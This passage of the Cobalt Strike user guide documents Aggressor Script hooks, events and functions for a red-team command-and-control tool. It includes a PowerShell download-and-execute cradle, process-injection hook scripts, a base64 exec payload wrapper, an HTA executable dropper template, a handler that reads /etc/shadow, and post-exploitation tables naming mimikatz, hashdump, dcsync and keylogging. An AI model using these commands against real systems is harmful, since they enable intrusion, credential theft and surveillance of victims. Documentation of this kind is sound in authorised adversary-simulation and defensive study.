||
CobaltStrikeUserGuide www.fortra.com page:230
|
||
|
||
AggressorScript/Hooks
|
||
set POWERSHELL_DOWNLOAD_CRADLE {
|
||
return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
|
||
}
|
||
PROCESS_INJECT_EXPLICIT
|
||
Hooktoallowuserstodefinehowtheexplicitprocessinjectiontechniqueisimplementedwhen
|
||
executingpostexploitationcommandsusingaBeaconObjectFile(BOF).
|
||
Arguments
|
||
$1-BeaconID
|
||
$2-memoryinjectabledll(position-independentcode)
|
||
$3-thePIDtoinjectinto
|
||
$4-offsettojumpto
|
||
$5-x86/x64-memoryinjectableDLLarch
|
||
Returns
|
||
Returnanonemptyvaluewhendefiningyourownexplicitprocessinjectiontechnique.
|
||
Return$nulltousethedefaultexplicitprocessinjectiontechnique.
|
||
PostExploitationJobs
|
||
ThefollowingpostexploitationcommandssupportthePROCESS_INJECT_EXPLICIThook.The
|
||
CommandcolumndisplaysthecommandtobeusedintheBeaconwindow,TheAggressor
|
||
Scriptcolumndisplaystheaggressorscriptfunctiontobeusedinscripts,andtheUIcolumn
|
||
displayswhichmenuoptiontouse.
|
||
AdditionalInformation
|
||
l
|
||
The[ProcessBrowser]interfaceisaccessedby[beacon] -> Explore -> Process List.
|
||
Thereisalsoamultiversionofthisinterfacewhichisaccessedbyselectingmultiple
|
||
sessionsandusingthesameUImenu.WhenintheProcessBrowserusethebuttonsto
|
||
perform additionalcommandsontheselectedprocess.
|
||
CobaltStrikeUserGuide www.fortra.com page:231
|
||
|
||
AggressorScript/Hooks
|
||
l
|
||
Thechromedump,dcsync,hashdump,keylogger,logonpasswords,mimikatz,net,
|
||
portscan,printscreen,pth,screenshot,screenwatch,ssh,andssh-key commands
|
||
alsohaveafork&runversion.Tousetheexplicitversionrequiresthepidandarchitecture
|
||
arguments.
|
||
l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
|
||
JobTypes
|
||
Command Aggressor Script UI
|
||
browserpivot &bbrowserpivot [beacon]->Explore->BrowserPivot
|
||
chromedump
|
||
dcsync &bdcsync
|
||
dllinject &bdllinject
|
||
hashdump &bhashdump
|
||
inject &binject [ProcessBrowser]->Inject
|
||
keylogger &bkeylogger [ProcessBrowser]->LogKeystrokes
|
||
logonpasswords &blogonpasswords
|
||
mimikatz &bmimikatz
|
||
&bmimikatz_small
|
||
net &bnet
|
||
portscan &bportscan
|
||
printscreen &bprintscreen
|
||
psinject &bpsinject
|
||
pth &bpassthehash
|
||
screenshot &bscreenshot [ProcessBrowser]->Screenshot(Yes)
|
||
screenwatch &bscreenwatch [ProcessBrowser]->Screenshot(No)
|
||
shinject &bshinject
|
||
ssh &bssh
|
||
ssh-key &bssh_key
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:232
|
||
|
||
AggressorScript/Hooks
|
||
# Hook to allow the user to define how the explicit injection technique
|
||
# is implemented when executing post exploitation commands.
|
||
# $1 = Beacon ID
|
||
# $2 = memory injectable dll for the post exploitation command
|
||
# $3 = the PID to inject into
|
||
# $4 = offset to jump to
|
||
# $5 = x86/x64 - memory injectable DLL arch
|
||
set PROCESS_INJECT_EXPLICIT {
|
||
local('$barch $handle $data $args $entry');
|
||
# Set the architecture for the beacon's session
|
||
$barch = barch($1);
|
||
# read in the injection BOF based on barch
|
||
warn("read the BOF: inject_explicit. $+ $barch $+ .o");
|
||
$handle = openf(script_resource("inject_explicit. $+ $barch $+ .o"));
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
# pack our arguments needed for the BOF
|
||
$args = bof_pack($1, "iib", $3, $4, $2);
|
||
btask($1, "Process Inject using explicit injection into pid $3");
|
||
# Set the entry point based on the dll's arch
|
||
$entry = "go $+ $5";
|
||
beacon_inline_execute($1, $data, $entry, $args);
|
||
# Let the caller know the hook was implemented.
|
||
return 1;
|
||
}
|
||
PROCESS_INJECT_SPAWN
|
||
Hooktoallowuserstodefinehowtheforkandrunprocessinjectiontechniqueisimplemented
|
||
whenexecutingpostexploitationcommandsusingaBeaconObjectFile(BOF).
|
||
Arguments
|
||
$1 -BeaconID
|
||
$2 -memoryinjectabledll(position-independentcode)
|
||
$3 -true/falseignoreprocesstoken
|
||
$4 -x86/x64-memoryinjectableDLLarch
|
||
CobaltStrikeUserGuide www.fortra.com page:233
|
||
|
||
AggressorScript/Hooks
|
||
Returns
|
||
Returnanonemptyvaluewhendefiningyourownforkandrunprocessinjectiontechnique.
|
||
Return$nulltousethedefaultforkandruninjectiontechnique.
|
||
PostExploitationJobs
|
||
ThefollowingpostexploitationcommandssupportthePROCESS_INJECT_SPAWNhook.The
|
||
CommandcolumndisplaysthecommandtobeusedintheBeaconwindow,TheAggressor
|
||
Scriptcolumndisplaystheaggressorscriptfunctiontobeusedinscripts,andtheUIcolumn
|
||
displayswhichmenuoptiontouse.
|
||
AdditionalInformation
|
||
l
|
||
Theelevate,runasadmin,&belevate,&brunasadmin and[beacon] -> Access ->
|
||
Elevate commandswillonlyusethePROCESS_INJECT_SPAWNhookwhenthe
|
||
specifiedexploitusesoneofthelistedaggressorscriptfunctionsinthetable,for
|
||
example&bpowerpick.
|
||
l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
|
||
l The‘(useahash)’notemeansselectacredentialthatreferencesahash.
|
||
JobTypes
|
||
Command Aggressor Script UI
|
||
chromedump
|
||
dcsync &bdcsync
|
||
elevate &belevate [beacon]->Access->Elevate
|
||
[beacon]->Access->GoldenTicket
|
||
hashdump &bhashdump [beacon]->Access->DumpHashes
|
||
keylogger &bkeylogger
|
||
logonpasswords &blogonpasswords [beacon]->Access->RunMimikatz
|
||
[beacon]->Access->MakeToken(usea
|
||
hash)
|
||
mimikatz &bmimikatz
|
||
&bmimikatz_small
|
||
CobaltStrikeUserGuide www.fortra.com page:234
|
||
|
||
AggressorScript/Hooks
|
||
Command Aggressor Script UI
|
||
net &bnet [beacon]->Explore->NetView
|
||
portscan &bportscan [beacon]->Explore->PortScan
|
||
powerpick &bpowerpick
|
||
printscreen &bprintscreen
|
||
pth &bpassthehash
|
||
runasadmin &brunasadmin
|
||
[target]->Scan
|
||
screenshot &bscreenshot [beacon]->Explore->Screenshot
|
||
screenwatch &bscreenwatch
|
||
ssh &bssh [target]->Jump->ssh
|
||
ssh-key &bssh_key [target]->Jump->ssh-key
|
||
[target]->Jump->[exploit](useahash)
|
||
Example
|
||
# ------------------------------------
|
||
# $1 = Beacon ID
|
||
# $2 = memory injectable dll (position-independent code)
|
||
# $3 = true/false ignore process token
|
||
# $4 = x86/x64 - memory injectable DLL arch
|
||
# ------------------------------------
|
||
set PROCESS_INJECT_SPAWN {
|
||
local('$barch $handle $data $args $entry');
|
||
# Set the architecture for the beacon's session
|
||
$barch = barch($1);
|
||
# read in the injection BOF based on barch
|
||
warn("read the BOF: inject_spawn. $+ $barch $+ .o");
|
||
$handle = openf(script_resource("inject_spawn. $+ $barch $+ .o"));
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
# pack our arguments needed for the BOF
|
||
$args = bof_pack($1, "sb", $3, $2);
|
||
btask($1, "Process Inject using fork and run");
|
||
# Set the entry point based on the dll's arch
|
||
$entry = "go $+ $4";
|
||
CobaltStrikeUserGuide www.fortra.com page:235
|
||
|
||
AggressorScript/Hooks
|
||
beacon_inline_execute($1, $data, $entry, $args);
|
||
# Let the caller know the hook was implemented.
|
||
return 1;
|
||
}
|
||
PSEXEC_SERVICE
|
||
Settheservicenameusedbyjumppsexec|psexec64|psexec_pshandpsexec.
|
||
Example
|
||
set PSEXEC_SERVICE {
|
||
return "foobar";
|
||
}
|
||
PYTHON_COMPRESS
|
||
CompressaPythonscriptgeneratedbyCobaltStrike.
|
||
Arguments
|
||
$1-thescripttocompress
|
||
ResourceKit
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Example
|
||
set PYTHON_COMPRESS {
|
||
return "import base64; exec base64.b64decode(\"" . base64_encode($1) .
|
||
"\")";
|
||
}
|
||
RESOURCE_GENERATOR
|
||
ControltheformatoftheVBStemplateusedinCobaltStrike.
|
||
ResourceKit
|
||
CobaltStrikeUserGuide www.fortra.com page:236
|
||
|
||
AggressorScript/Hooks
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Arguments
|
||
$1-theshellcodetoinjectandrun
|
||
RESOURCE_GENERATOR_VBS
|
||
ControlsthecontentoftheHTMLApplicationUser-driven(EXEOutput)generatedbyCobalt
|
||
Strike.
|
||
Arguments
|
||
$1-theEXEdata
|
||
$2-thenameofthe.exe
|
||
ResourceKit
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Example
|
||
set HTMLAPP_EXE {
|
||
local('$handle $data');
|
||
$handle = openf(script_resource("template.exe.hta"));
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
$data = strrep($data, '##EXE##', transform($1, "hex"));
|
||
$data = strrep($data, '##NAME##', $2);
|
||
return $data;
|
||
}
|
||
SIGNED_APPLET_MAINCLASS
|
||
SpecifyaJavaAppletfiletousefortheJavaSignedAppletAttack.SeeJava Signed Applet
|
||
Attack on page 80.
|
||
AppletKit
|
||
CobaltStrikeUserGuide www.fortra.com page:237
|
||
|
||
AggressorScript/Hooks
|
||
ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
|
||
Arsenal(Help->Arsenal).
|
||
Example
|
||
set SIGNED_APPLET_MAINCLASS {
|
||
return "Java.class";
|
||
}
|
||
SIGNED_APPLET_RESOURCE
|
||
SpecifyaJavaAppletfiletousefortheJavaSignedAppletAttack.SeeJava Signed Applet
|
||
Attack on page 80.
|
||
AppletKit
|
||
ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
|
||
Arsenal(Help->Arsenal).
|
||
Example
|
||
set SIGNED_APPLET_RESOURCE {
|
||
return script_resource("dist/applet_signed.jar");
|
||
}
|
||
SMART_APPLET_MAINCLASS
|
||
SpecifytheMAINclassoftheJavaSmartAppletAttack.SeeJava Smart Applet Attack on
|
||
page 81.
|
||
AppletKit
|
||
ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
|
||
Arsenal(Help->Arsenal).
|
||
Example
|
||
set SMART_APPLET_MAINCLASS {
|
||
return "Java.class";
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:238
|
||
|
||
AggressorScript/Events
|
||
SMART_APPLET_RESOURCE
|
||
SpecifyaJavaAppletfiletousefortheJavaSmartAppletAttack.SeeJava Smart Applet
|
||
Attack on page 81.
|
||
AppletKit
|
||
ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
|
||
Arsenal(Help->Arsenal).
|
||
Example
|
||
set SMART_APPLET_RESOURCE {
|
||
return script_resource("dist/applet_rhino.jar");
|
||
}
|
||
Events
|
||
ThesearetheeventsfiredbyAggressorScript.
|
||
*
|
||
ThiseventfireswheneveranyAggressorScripteventfires.
|
||
Arguments
|
||
$1-theoriginaleventname
|
||
...-theargumentstotheevent
|
||
Example
|
||
# event spy script
|
||
on * {
|
||
println("[ $+ $1 $+ ]: " . subarray(@_, 1));
|
||
}
|
||
beacon_checkin
|
||
CobaltStrikeUserGuide www.fortra.com page:239
|
||
|
||
AggressorScript/Events
|
||
FiredwhenaBeaconcheckinacknowledgementispostedtoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
beacon_error
|
||
FiredwhenanerrorispostedtoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
beacon_indicator
|
||
FiredwhenanindicatorofcompromisenoticeispostedtoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-theuserresponsiblefortheinput
|
||
$3-thetextofthemessage
|
||
$4-whenthismessageoccurred
|
||
beacon_initial
|
||
FiredwhenaBeaconcallshomeforthefirsttime.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:240
|
||
|
||
AggressorScript/Events
|
||
$1-theIDofthebeaconthatcalledhome.
|
||
Example
|
||
on beacon_initial {
|
||
# list network connections
|
||
bshell($1, "netstat -na | findstr \"ESTABLISHED\"");
|
||
# list shares
|
||
bshell($1, "net use");
|
||
# list groups
|
||
bshell($1, "whoami /groups");
|
||
}
|
||
beacon_initial_empty
|
||
FiredwhenaDNSBeaconcallshomeforthefirsttime.Atthispoint,nometadatahasbeen
|
||
exchanged.
|
||
Arguments
|
||
$1-theIDofthebeaconthatcalledhome.
|
||
Example
|
||
on beacon_initial_empty {
|
||
binput($1, "[Acting on new DNS Beacon]");
|
||
# change the data channel to DNS TXT
|
||
bmode($1, "dns-txt");
|
||
# request the Beacon checkin and send its metadata
|
||
bcheckin($1);
|
||
}
|
||
beacon_input
|
||
FiredwhenaninputmessageispostedtoaBeacon'sconsole.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:241
|
||
|
||
AggressorScript/Events
|
||
$1-theIDofthebeacon
|
||
$2-theuserresponsiblefortheinput
|
||
$3-thetextofthemessage
|
||
$4-whenthismessageoccurred
|
||
beacon_mode
|
||
FiredwhenamodechangeacknowledgementispostedtoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
beacon_output
|
||
FiredwhenoutputispostedtoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
beacon_output_alt
|
||
Firedwhen(alternate)outputispostedtoaBeacon'sconsole.Whatmakesforalternateoutput?
|
||
It'sjustdifferentpresentationfromnormaloutput.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthemessage
|
||
CobaltStrikeUserGuide www.fortra.com page:242
|
||
|
||
AggressorScript/Events
|
||
$3-whenthismessageoccurred
|
||
beacon_output_jobs
|
||
FiredwhenjobsoutputissenttoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthejobsoutput
|
||
$3-whenthismessageoccurred
|
||
beacon_output_ls
|
||
FiredwhenlsoutputissenttoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthelsoutput
|
||
$3-whenthismessageoccurred
|
||
beacon_output_ps
|
||
FiredwhenpsoutputissenttoaBeacon'sconsole.
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthepsoutput
|
||
$3-whenthismessageoccurred
|
||
beacon_tasked
|
||
FiredwhenataskacknowledgementispostedtoaBeacon'sconsole.
|
||
CobaltStrikeUserGuide www.fortra.com page:243
|
||
|
||
AggressorScript/Events
|
||
Arguments
|
||
$1-theIDofthebeacon
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
beacons
|
||
FiredwhentheteamserversendsoverfreshinformationonallofourBeacons.Thisoccurs
|
||
aboutonceeachsecond.
|
||
Arguments
|
||
$1-anarrayofdictionaryobjectswithmetadataforeachBeacon.
|
||
custom_event_<event name>
|
||
Firedwhenaclientreceivesacustomeventfromanotherclient.
|
||
Arguments
|
||
$1-whosentthecustomevent
|
||
$2-theeventdata
|
||
$3-thetimetheeventwassent
|
||
Example
|
||
# subscribe to the my-topic custom event
|
||
on "custom_event_my-topic" {
|
||
println("Received my-topic:")
|
||
println("\tSender: $1");
|
||
println("\tData: $2");
|
||
println("\tTimestamp: $3");
|
||
}
|
||
disconnect
|
||
CobaltStrikeUserGuide www.fortra.com page:244
|
||
|
||
AggressorScript/Events
|
||
FiredwhenthisCobaltStrikebecomesdisconnectedfromtheteamserver.
|
||
event_action
|
||
Firedwhenauserperformsanactionintheeventlog.ThisissimilartoanactiononIRC(the
|
||
/mecommand)
|
||
Arguments
|
||
$1-whothemessageisfrom
|
||
$2-thecontentsofthemessage
|
||
$3-thetimethemessagewasposted
|
||
event_beacon_initial
|
||
Firedwhenaninitialbeaconmessageispostedtotheeventlog.
|
||
Arguments
|
||
$1-thecontentsofthemessage
|
||
$2-thetimethemessagewasposted
|
||
event_join
|
||
Firedwhenauserconnectstotheteamserver
|
||
Arguments
|
||
$1-whojoinedtheteamserver
|
||
$2-thetimethemessagewasposted
|
||
event_newsite
|
||
Firedwhenanewsitemessageispostedtotheeventlog.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:245
|
||
|
||
AggressorScript/Events
|
||
$1-whosetupthenewsite
|
||
$2-thecontentsofthenewsitemessage
|
||
$3-thetimethemessagewasposted
|
||
event_notify
|
||
Firedwhenamessagefromtheteamserverispostedtotheeventlog.
|
||
Arguments
|
||
$1-thecontentsofthemessage
|
||
$2-thetimethemessagewasposted
|
||
event_nouser
|
||
FiredwhenthecurrentCobaltStrikeclienttriestointeractwithauserwhoisnotconnectedto
|
||
theteamserver.
|
||
Arguments
|
||
$1-whoisnotpresent
|
||
$2-thetimethemessagewasposted
|
||
event_private
|
||
Firedwhenaprivatemessageispostedtotheeventlog.
|
||
Arguments
|
||
$1-whothemessageisfrom
|
||
$2-whothemessageisdirectedto
|
||
$3-thecontentsofthemessage
|
||
$4-thetimethemessagewasposted
|
||
CobaltStrikeUserGuide www.fortra.com page:246
|
||
|
||
AggressorScript/Events
|
||
event_public
|
||
Firedwhenapublicmessageispostedtotheeventlog.
|
||
Arguments
|
||
$1-whothemessageisfrom
|
||
$2-thecontentsofthemessage
|
||
$3-thetimethemessagewasposted
|
||
event_quit
|
||
Firedwhensomeonedisconnectsfromtheteamserver.
|
||
Arguments
|
||
$1-wholefttheteamserver
|
||
$2-thetimethemessagewasposted
|
||
heartbeat_10m
|
||
Firedeverytenminutes
|
||
heartbeat_10s
|
||
Firedeverytenseconds
|
||
heartbeat_15m
|
||
Firedeveryfifteenminutes
|
||
heartbeat_15s
|
||
Firedeveryfifteenseconds
|
||
CobaltStrikeUserGuide www.fortra.com page:247
|
||
|
||
AggressorScript/Events
|
||
heartbeat_1m
|
||
Firedeveryminute
|
||
heartbeat_1s
|
||
Firedeverysecond
|
||
heartbeat_20m
|
||
Firedeverytwentyminutes
|
||
heartbeat_30m
|
||
Firedeverythirtyminutes
|
||
heartbeat_30s
|
||
Firedeverythirtyseconds
|
||
heartbeat_5m
|
||
Firedeveryfiveminutes
|
||
heartbeat_5s
|
||
Firedeveryfiveseconds
|
||
heartbeat_60m
|
||
Firedeverysixtyminutes
|
||
keylogger_hit
|
||
Firedwhentherearenewresultsreportedtothewebserverviatheclonedsitekeystrokelogger.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:248
|
||
|
||
AggressorScript/Events
|
||
$1-externaladdressofvisitor
|
||
$2-reserved
|
||
$3-theloggedkeystrokes
|
||
$4-thephishingtokenfortheserecordedkeystrokes.
|
||
keystrokes
|
||
FiredwhenCobaltStrikereceiveskeystrokes
|
||
Arguments
|
||
$1-adictionarywithinformationaboutthekeystrokes.
|
||
Key Value
|
||
bid BeaconIDforsessionkeystrokesoriginatedfrom
|
||
data keystrokedatareportedinthisbatch
|
||
id identifierforthiskeystrokebuffer
|
||
session desktopsessionfromkeystrokelogger
|
||
title lastactivewindowtitlefromkeystrokelogger
|
||
user usernamefromkeystrokelogger
|
||
when timestampofwhentheseresultsweregenerated
|
||
Example
|
||
on keystrokes {
|
||
if ("*Admin*" iswm $1["title"]) {
|
||
blog($1["bid"], "Interesting keystrokes received.
|
||
Go to \c4View -> Keystrokes\o and look for the green buffer.");
|
||
highlight("keystrokes", @($1), "good");
|
||
}
|
||
}
|
||
profiler_hit
|
||
FiredwhentherearenewresultsreportedtotheSystemProfiler.
|
||
CobaltStrikeUserGuide www.fortra.com page:249
|
||
|
||
AggressorScript/Events
|
||
Arguments
|
||
$1-externaladdressofvisitor
|
||
$2-de-cloakedinternaladdressofvisitor(or"unknown")
|
||
$3-visitor'sUser-Agent
|
||
$4-adictionarycontainingtheapplications.
|
||
$5-thephishingtokenofthevisitor(use&tokenToEmailtoresolvetoanemailaddress)
|
||
ready
|
||
FiredwhenthisCobaltStrikeclientisconnectedtotheteamserverandreadytoact.
|
||
screenshots
|
||
FiredwhenCobaltStrikereceivesascreenshot.
|
||
Arguments
|
||
$1-adictionarywithinformationaboutthescreenshot.
|
||
Key Value
|
||
bid BeaconIDforsessionscreenshotoriginatedfrom
|
||
data rawscreenshotdata(thisisa.jpgfile)
|
||
id identifierforthisscreenshot
|
||
session desktopsessionreportedbyscreenshottool
|
||
title activewindowtitlefromscreenshottool
|
||
user usernamefromscreenshottool
|
||
when timestampofwhenthisscreenshotwasreceived
|
||
Example
|
||
# watch for any screenshots where someone is banking and
|
||
# redact it from the user-interface.
|
||
on screenshots {
|
||
CobaltStrikeUserGuide www.fortra.com page:250
|
||
|
||
AggressorScript/Events
|
||
local('$title');
|
||
$title = lc($1["title"]);
|
||
if ("*bankofamerica*" iswm $title) {
|
||
redactobject($1["id"]);
|
||
}
|
||
else if ("jpmc*" iswm $title) {
|
||
redactobject($1["id"]);
|
||
}
|
||
}
|
||
sendmail_done
|
||
Firedwhenaphishingcampaigncompletes
|
||
Arguments
|
||
$1-thecampaignID
|
||
sendmail_post
|
||
Firedafteraphishissenttoanemailaddress.
|
||
Arguments
|
||
$1-thecampaignID
|
||
$2-theemailwe'resendingaphishto
|
||
$3-thestatusofthephish(e.g.,SUCCESS)
|
||
$4-themessagefromthemailserver
|
||
sendmail_pre
|
||
Firedbeforeaphishissenttoanemailaddress.
|
||
Arguments
|
||
$1-thecampaignID
|
||
$2-theemailwe'resendingaphishto
|
||
CobaltStrikeUserGuide www.fortra.com page:251
|
||
|
||
AggressorScript/Events
|
||
sendmail_start
|
||
Firedwhenanewphishingcampaignkicksoff.
|
||
Arguments
|
||
$1-thecampaignID
|
||
$2-numberoftargets
|
||
$3-localpathtoattachment
|
||
$4-thebouncetoaddress
|
||
$5-themailserverstring
|
||
$6-thesubjectofthephishingemail
|
||
$7-thelocalpathtothephishingtemplate
|
||
$8-theURLtoembedintothephish
|
||
ssh_checkin
|
||
FiredwhenanSSHclientcheckinacknowledgementispostedtoanSSHconsole.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
ssh_error
|
||
FiredwhenanerrorispostedtoanSSHconsole.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
CobaltStrikeUserGuide www.fortra.com page:252
|
||
|
||
AggressorScript/Events
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
ssh_indicator
|
||
FiredwhenanindicatorofcompromisenoticeispostedtoanSSHconsole.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
$2-theuserresponsiblefortheinput
|
||
$3-thetextofthemessage
|
||
$4-whenthismessageoccurred
|
||
ssh_initial
|
||
FiredwhenanSSHsessionisseenforthefirsttime.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
Example
|
||
on ssh_initial {
|
||
if (-isadmin $1) {
|
||
bshell($1, "cat /etc/shadow");
|
||
}
|
||
}
|
||
ssh_input
|
||
FiredwhenaninputmessageispostedtoanSSHconsole.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
CobaltStrikeUserGuide www.fortra.com page:253
|
||
|
||
AggressorScript/Events
|
||
$2-theuserresponsiblefortheinput
|
||
$3-thetextofthemessage
|
||
$4-whenthismessageoccurred
|
||
ssh_output
|
||
FiredwhenoutputispostedtoanSSHconsole.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
ssh_output_alt
|
||
Firedwhen(alternate)outputispostedtoanSSHconsole.Whatmakesforalternateoutput?It's
|
||
justdifferentpresentationfromnormaloutput.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
ssh_tasked
|
||
FiredwhenataskacknowledgementispostedtoanSSHconsole.
|
||
Arguments
|
||
$1-theIDofthesession
|
||
$2-thetextofthemessage
|
||
$3-whenthismessageoccurred
|
||
CobaltStrikeUserGuide www.fortra.com page:254
|
||
|
||
AggressorScript/Functions
|
||
web_hit
|
||
Firedwhenthere'sanewhitonCobaltStrike'swebserver.
|
||
Arguments
|
||
$1-themethod(e.g.,GET,POST)
|
||
$2-therequestedURI
|
||
$3-thevisitor'saddress
|
||
$4-thevisitor'sUser-Agentstring
|
||
$5-thewebserver'sresponsetothehit(e.g.,200)
|
||
$6-thesizeofthewebserver'sresponse
|
||
$7-adescriptionofthehandlerthatprocessedthishit.
|
||
$8-adictionarycontainingtheparameterssenttothewebserver
|
||
$9-thetimewhenthehittookplace.
|
||
Functions
|
||
ThisisalistofAggressorScript'sfunctions.
|
||
QuickJump
|
||
A|B|C |D |E |F |G |H|I|J |K |L|M|N |O|P|Q|R |S |T |U |W |X|Y |Z
|
||
-hasbootstraphint
|
||
Checkifabytearrayhasthex86orx64bootstraphint.Usethisfunctiontodetermineifit'ssafe
|
||
touseanartifactthatpassesGetProcAddress/GetModuleHandleApointerstothispayload.
|
||
Arguments
|
||
$1-bytearraywithapayloadorshellcode.
|
||
CobaltStrikeUserGuide www.fortra.com page:255
|
||
|
||
AggressorScript/Functions
|
||
Seealso
|
||
&payload_bootstrap_hint
|
||
-is64
|
||
Checkifasessionisonanx64systemornot(Beacononly).
|
||
Arguments
|
||
$1-Beacon/SessionID
|
||
Example
|
||
command x64 {
|
||
foreach $session (beacons()) {
|
||
if (-is64 $session['id']) {
|
||
println($session);
|
||
}
|
||
}
|
||
}
|
||
-isactive
|
||
Checkifasessionisactiveornot.Asessionisconsideredactiveif(a)ithasnotacknowledged
|
||
anexitmessageAND(b)itisnotdisconnectedfromaparentBeacon.
|
||
Arguments
|
||
$1-Beacon/SessionID
|
||
Example
|
||
command active {
|
||
local('$bid');
|
||
foreach $bid (beacon_ids()) {
|
||
if (-isactive $bid) {
|
||
println("$bid is active!");
|
||
}
|
||
}
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:256
|
||
|
||
AggressorScript/Functions
|
||
-isadmin
|
||
Checkifasessionhasadminrights
|
||
Arguments
|
||
$1-Beacon/SessionID
|
||
Example
|
||
command admin_sessions {
|
||
foreach $session (beacons()) {
|
||
if (-isadmin $session['id']) {
|
||
println($session);
|
||
}
|
||
}
|
||
}
|
||
-isbeacon
|
||
CheckifasessionisaBeaconornot.
|
||
Arguments
|
||
$1-Beacon/SessionID
|
||
Example
|
||
command beacons {
|
||
foreach $session (beacons()) {
|
||
if (-isbeacon $session['id']) {
|
||
println($session);
|
||
}
|
||
}
|
||
}
|
||
-isssh
|
||
CheckifasessionisanSSHsessionornot.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:257
|
||
|
||
AggressorScript/Functions
|
||
$1-Beacon/SessionID
|
||
Example
|
||
command ssh_sessions {
|
||
foreach $session (beacons()) {
|
||
if (-isssh $session['id']) {
|
||
println($session);
|
||
}
|
||
}
|
||
}
|
||
action
|
||
Postapublicactionmessagetotheeventlog.Thisissimilartothe/mecommand.
|
||
Arguments
|
||
$1-themessage
|
||
Example
|
||
action("dances!");
|
||
addTab
|
||
CreateatabtodisplayaGUIobject.
|
||
Arguments
|
||
$1-thetitleofthetab
|
||
$2-aGUIobject.AGUIobjectisonethatisaninstanceofjavax.swing.JComponent.
|
||
$3-atooltiptodisplaywhenauserhoversoverthistab.
|
||
Example
|
||
$label = [new javax.swing.JLabel: "Hello World"];
|
||
addTab("Hello!", $label, "this is an example");
|
||
CobaltStrikeUserGuide www.fortra.com page:258
|
||
|
||
AggressorScript/Functions
|
||
addVisualization
|
||
RegisteravisualizationwithCobaltStrike.
|
||
Arguments
|
||
$1-thenameofthevisualization
|
||
$2-ajavax.swing.JComponentobject
|
||
Example
|
||
$label = [new javax.swing.JLabel: "Hello World!"];
|
||
addVisualization("Hello World", $label);
|
||
Seealso
|
||
&showVisualization
|
||
add_to_clipboard
|
||
Addtexttotheclipboard,notifytheuser.
|
||
Arguments
|
||
$1-thetexttoaddtotheclipboard
|
||
Example
|
||
add_to_clipboard("Paste me you fool!");
|
||
alias
|
||
CreatesanaliascommandintheBeaconconsole
|
||
Arguments
|
||
$1-thealiasnametobindto
|
||
CobaltStrikeUserGuide www.fortra.com page:259
|
||
|
||
AggressorScript/Functions
|
||
$2-acallbackfunction.Calledwhentheuserrunsthealias.Argumentsare:$0=commandrun,
|
||
$1=beaconid,$2=arguments.
|
||
Example
|
||
alias("foo", {
|
||
btask($1, "foo!");
|
||
});
|
||
alias_clear
|
||
Removesanaliascommand(andrestoresdefaultfunctionality;ifitexisted)
|
||
Arguments
|
||
$1-thealiasnametoremove
|
||
Example
|
||
alias_clear("foo");
|
||
all_payloads
|
||
Generatesallofthestagelesspayloads(inx86andx64)foralloftheconfiguredlisteners.(also
|
||
availableintheUImenuunderPayloads -> Windows Stageless Generate all Payloads)
|
||
Arguments
|
||
$1-Thefolderpathtocreatethepayloadsin.
|
||
$2-Abooleanvalueforwhethertheexecutablefilesshouldbesigned.
|
||
$3–Astringvalueforthesystemcallmethod.Validvaluesare:
|
||
None:UsethestandardWindowsAPIfunction.
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
|
||
CobaltStrikeUserGuide www.fortra.com page:260
|
||
|
||
AggressorScript/Functions
|
||
$4-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
|
||
string).
|
||
Example
|
||
$folder = all_payloads "/tmp/payloads", 1, "None");
|
||
println("Payloads have been saved to $folder");
|
||
applications
|
||
